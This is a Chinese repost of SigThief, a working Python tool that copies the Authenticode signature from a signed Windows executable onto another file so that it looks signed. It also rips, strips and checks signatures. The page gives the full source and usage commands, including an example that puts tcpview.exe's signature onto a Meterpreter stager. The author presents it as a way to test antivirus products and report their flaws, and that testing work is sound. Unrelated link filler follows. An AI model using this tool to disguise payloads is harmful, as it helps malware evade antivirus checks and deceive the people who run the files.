Windows 签名伪造工具的使用,Python,签名
- #!/usr/bin/env python3
- # LICENSE: BSD-3
- # Copyright: Josh Pitts @midnite_runr
- import sys
- import struct
- import shutil
- import io
- from optparse import OptionParser
- def gather_file_info_win(binary):
- """
- Borrowed from BDF...
- I could just skip to certLOC... *shrug*
- """
- flItms = {}
- binary = open(binary, 'rb')
- binary.seek(int('3C', 16))
- flItms['buffer'] = 0
- flItms['JMPtoCodeAddress'] = 0
- flItms['dis_frm_pehdrs_sectble'] = 248
- flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
- # Start of COFF
- flItms['COFF_Start'] = flItms['pe_header_location'] + 4
- binary.seek(flItms['COFF_Start'])
- flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
- binary.seek(flItms['COFF_Start'] + 2, 0)
- flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
- flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
- binary.seek(flItms['COFF_Start'] + 16, 0)
- flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
- flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
- #End of COFF
- flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
- #if flItms['SizeOfOptionalHeader']:
- #Begin Standard Fields section of Optional Header
- binary.seek(flItms['OptionalHeader_start'])
- flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
- flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
- flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
- flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
- flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
- flItms['SizeOfUninitializedData'] = struct.unpack("<I",
- binary.read(4))[0]
- flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
- flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
- flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
- if flItms['Magic'] != 0x20B:
- flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
- # End Standard Fields section of Optional Header
- # Begin Windows-Specific Fields of Optional Header
- if flItms['Magic'] == 0x20B:
- flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
- else:
- flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
- flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
- flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
- flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
- binary.read(2))[0]
- flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
- binary.read(2))[0]
- flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
- flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
- flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
- flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
- flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
- flItms['SizeOfImageLoc'] = binary.tell()
- flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
- flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
- flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
- flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
- flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
- if flItms['Magic'] == 0x20B:
- flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
- flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
- flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
- flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
- else:
- flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
- flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
- flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
- flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
- flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0] # zero
- flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
- # End Windows-Specific Fields of Optional Header
- # Begin Data Directories of Optional Header
- flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
- flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
- flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
- #ImportTable SIZE|LOC
- flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
- flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
- flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
- flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
- flItms['CertTableLOC'] = binary.tell()
- flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
- flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
- binary.close()
- return flItms
- def copyCert(exe):
- flItms = gather_file_info_win(exe)
- if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
- # not signed
- print("Input file Not signed!")
- sys.exit(-1)
- with open(exe, 'rb') as f:
- f.seek(flItms['CertLOC'], 0)
- cert = f.read(flItms['CertSize'])
- return cert
- def writeCert(cert, exe, output):
- flItms = gather_file_info_win(exe)
- if not output:
- output = output = str(exe) + "_signed"
- shutil.copy2(exe, output)
- print("Output file: {0}".format(output))
- with open(exe, 'rb') as g:
- with open(output, 'wb') as f:
- f.write(g.read())
- f.seek(0)
- f.seek(flItms['CertTableLOC'], 0)
- f.write(struct.pack("<I", len(open(exe, 'rb').read())))
- f.write(struct.pack("<I", len(cert)))
- f.seek(0, io.SEEK_END)
- f.write(cert)
- print("Signature appended. \nFIN.")
- def outputCert(exe, output):
- cert = copyCert(exe)
- if not output:
- output = str(exe) + "_sig"
- print("Output file: {0}".format(output))
- open(output, 'wb').write(cert)
- print("Signature ripped. \nFIN.")
- def check_sig(exe):
- flItms = gather_file_info_win(exe)
- if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
- # not signed
- print("Inputfile Not signed!")
- else:
- print("Inputfile is signed!")
- def truncate(exe, output):
- flItms = gather_file_info_win(exe)
- if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
- # not signed
- print("Inputfile Not signed!")
- sys.exit(-1)
- else:
- print( "Inputfile is signed!")
- if not output:
- output = str(exe) + "_nosig"
- print("Output file: {0}".format(output))
- shutil.copy2(exe, output)
- with open(output, "r+b") as binary:
- print('Overwriting certificate table pointer and truncating binary')
- binary.seek(-flItms['CertSize'], io.SEEK_END)
- binary.truncate()
- binary.seek(flItms['CertTableLOC'], 0)
- binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
- print("Signature removed. \nFIN.")
- def signfile(exe, sigfile, output):
- flItms = gather_file_info_win(exe)
- cert = open(sigfile, 'rb').read()
- if not output:
- output = output = str(exe) + "_signed"
- shutil.copy2(exe, output)
- print("Output file: {0}".format(output))
- with open(exe, 'rb') as g:
- with open(output, 'wb') as f:
- f.write(g.read())
- f.seek(0)
- f.seek(flItms['CertTableLOC'], 0)
- f.write(struct.pack("<I", len(open(exe, 'rb').read())))
- f.write(struct.pack("<I", len(cert)))
- f.seek(0, io.SEEK_END)
- f.write(cert)
- print("Signature appended. \nFIN.")
- if __name__ == "__main__":
- usage = 'usage: %prog [options]'
- parser = OptionParser()
- parser.add_option("-i", "--file", dest="inputfile",
- help="input file", metavar="FILE")
- parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
- help='rip signature off inputfile')
- parser.add_option('-a', '--add', dest='addsig', action='store_true',
- help='add signautre to targetfile')
- parser.add_option('-o', '--output', dest='outputfile',
- help='output file')
- parser.add_option('-s', '--sig', dest='sigfile',
- help='binary signature from disk')
- parser.add_option('-t', '--target', dest='targetfile',
- help='file to append signature to')
- parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
- help='file to check if signed; does not verify signature')
- parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
- help='truncate signature (i.e. remove sig)')
- (options, args) = parser.parse_args()
- # rip signature
- # inputfile and rip to outputfile
- if options.inputfile and options.ripsig:
- print("Ripping signature to file!")
- outputCert(options.inputfile, options.outputfile)
- sys.exit()
- # copy from one to another
- # inputfile and rip to targetfile to outputfile
- if options.inputfile and options.targetfile:
- cert = copyCert(options.inputfile)
- writeCert(cert, options.targetfile, options.outputfile)
- sys.exit()
- # check signature
- # inputfile
- if options.inputfile and options.checksig:
- check_sig(options.inputfile)
- sys.exit()
- # add sig to target file
- if options.targetfile and options.sigfile:
- signfile(options.targetfile, options.sigfile, options.outputfile)
- sys.exit()
- # truncate
- if options.inputfile and options.truncate:
- truncate(options.inputfile, options.outputfile)
- sys.exit()
- parser.print_help()
- parser.error("You must do something!")
仅限安全专业人员......
这是什么?
多年来,我注意到在针对反病毒软件的测试中,每个都是不同的,并且每个PE签名的优先级不同,无论签名是否有效。有些反病毒软件供应商优先考虑某些证书颁发机构而不检查签名是否真正有效,并且有一些只是检查以查看certTable是否填充了某些值。一团糟。
所以我发布这个工具让你快速进行测试,并随时向供应商报告。
简而言之,它将从已签名的PE文件中删除签名并将其附加到另一个文件,修复证书表以对文件进行签名。
当然,这不是一个有效值的签名,这就是重点!
我期待听到您的结果!
如何使用 ?
用法
Usage: sigthief.py [options]Options:-h, --help show this help message and exit-i FILE, --file=FILE input file-r, --rip rip signature off inputfile-a, --add add signautre to targetfile-o OUTPUTFILE, --output=OUTPUTFILEoutput file-s SIGFILE, --sig=SIGFILEbinary signature from disk-t TARGETFILE, --target=TARGETFILEfile to append signature too-c, --checksig file to check if signed; does not verify signature-T, --truncate truncate signature (i.e. remove sig)
从二进制文件中获取签名并将其添加到另一个二进制文件中
$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exeOutput file: /tmp/msftesting_tcpview.exeSignature appended.FIN.
将签名保存到磁盘以供以后使用
$ ./sigthief.py -i tcpview.exe -rRipping signature to file!Output file: tcpview.exe_sigSignature ripped.FIN.
使用翻录签名
$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exeOutput file: x86_meterpreter_stager.exe_signedSignature appended.FIN.
截断(删除)签名
这实际上有非常有趣的结果,可以帮助您找到重视代码功能签名的AV。Unsign putty.exe;)
$ ./sigthief.py -i tcpview.exe -TInputfile is signed!Output file: tcpview.exe_nosigOverwriting certificate table pointer and truncating binarySignature removed.FIN.
检查是否有签名(不检查有效性)
$ ./sigthief.py -i tcpview.exe -cInputfile is signed!
git clone https://github.com/secretsquirrel/SigThief
Windows 签名伪造工具的使用,Python,签名的更多相关文章
- 用 Python 制作一个艺术签名小工具,给自己设计一个优雅的签名
生活中有很多场景都需要我们签字(签名),如果是一些不重要的场景,我们的签名好坏基本无所谓了,但如果是一些比较重要的场景,如果我们的签名比较差的话,就有可能给别人留下不太好的印象了,俗话说字如其人嘛,本 ...
- 微信开发中access_token,js_ticket,时间戳,签名生成工具
Access_token生成工具 工具地址:https://mp.weixin.qq.com/debug 这个工具主要用来验证和生成微信公众号access_token,主要有正确的app_id和app ...
- [工具向]__androidstudio签名打包apk及配置自动签名
前言 好几天了,没怎么更新了,最近迷上了抓妖,有些懈怠了,这两天在看android的一些东西,java暂时就先放了放,昨天终于是完成了一个小阶段的任务,今天来对这两天的东西进行一下总结. *** 因为 ...
- Windows 硬件开发人员怎样选择代码签名证书类型
在建立 Windows 开发人员中心硬件仪表板帐户之前,你需要获取代码签名证书以保护数字信息的安全.此证书是用于建立你的公司对你所提交代码的所有权的接受标准.它让你可以用数字形式签署 PE 二进制文件 ...
- 如何使用在线工具手动验证JWT签名
如何使用在线工具手动验证JWT签名 先丢一个转换地址:https://cryptii.com/ 首先: jwt分为三个部分:header,payload,verifysignature ...
- 【Python】Windows微信清理工具v.3.0.2
Windows微信清理工具v.3.0.2 更新内容: 1.清理完成时可显示删除了哪些文件. 软件截图: 所有版本及源码下载链接: 百度网盘:https://pan.baidu.com/s/1OSIpv ...
- [转]windows环境下使用virtualenv对python进行多版本隔离
windows环境下使用virtualenv对python进行多版本隔离 最近在用python做一个文本的情感分析的项目,用到tensorflow,需要用python3的版本,之前因为<机器学习 ...
- 托管调试助手 "PInvokeStackImbalance":的调用导致堆栈不对称。原因可能是托管的 PInvoke 签名与非托管的目标签名不匹配。请检查 PInvoke 签名的调用约定和参数与非托管
在C#中一定要检查引用时的数据类型 WinAPI 的数据类型 默认是32位的,但是引用时外部的是 Long类型默认是64位的.所以引用时需要将 long 改为 int 型. 参照 http://blo ...
- Windows更新清理工具 (winsxs 清理工具)
Windows 更新清理工具是一款效果非常显著的Windows7.Windows8操作系统清理优化工具!经常安装系统的朋友相比有所体会,刚刚安装完成的Win7.Win8其实占的空间并不大,去掉页面文件 ...
随机推荐
- Nmap命令使用方法
Nmap使用合集 感谢博主:VVVinson 文章链接:https://www.cnblogs.com/Vinson404/p/7784829.html 参 数 说 明 ...
- JAVA-标识符、变量、数据类型
标识符和关键字 所有的标识符否应该以字母a ~ z和 A ~Z ,美元符($).下划线(_)开始. 首字符之后可以是字母a ~ z和 A ~Z ,美元符($).下划线(_)的任意字符组合. 注 ...
- 基于ABP框架的SignalR,使用Winform程序进行功能测试
在ABP框架里面,默认会带入SignalR消息处理技术,它同时也是ABP框架里面实时消息处理.事件/通知处理的一个实现方式,SignalR消息处理本身就是一个实时很好的处理方案,我在之前在我的Winf ...
- C# 基础 - Environment 类
1. 程序根目录: (D:\\...\\WpfApp1\\WpfApp1\\bin\\Debug") string exePath = Environment.CurrentDirector ...
- addEventListener的第三个参数详解
示例代码 element.addEventListener("mousedown", func, { passive: true }); element.addEventList ...
- 【Azure 微服务】PowerShell中,用Connect-ServiceFabricCluster命令无法连接到sf-test.chinaeast2.cloudapp.chinacloudapi.cn:19000 问题分析
问题描述 Azure Service Fabric提供了PowerShell的指令来进行创建,管理资源,如Get-ServiceFabricClusterHealth 获取当前集群的健康状态,但这些命 ...
- VSCode 微信小程序扩展开发
写在前面 为什么要开发这个扩展呢,是因为微信开发者工具自身不支持页面引入组件的跳转,人工根据引入组件路径查看对应代码的方式,效率偏低.就形如这样的json文件,引入了多个组件,比如要查看 " ...
- Flutter,Weex,React Native比较
- canvas-修改图片亮度
canvas操作-修改图片亮度 目录 canvas操作-修改图片亮度 图片亮度的概念 下面用ps截图举一个例子: 调整图片亮度的方案 实现方案一 从RGB到HSV的转换 转换的公式 javascrip ...
- java例题_33 等腰输出杨辉三角
1 /*33 [程序 33 杨辉三角] 2 题目:打印出杨辉三角形(要求打印出 10 行如下图) 3 程序分析: 4 1 5 1 1 6 1 2 1 7 1 3 3 1 8 1 4 6 4 1 9 1 ...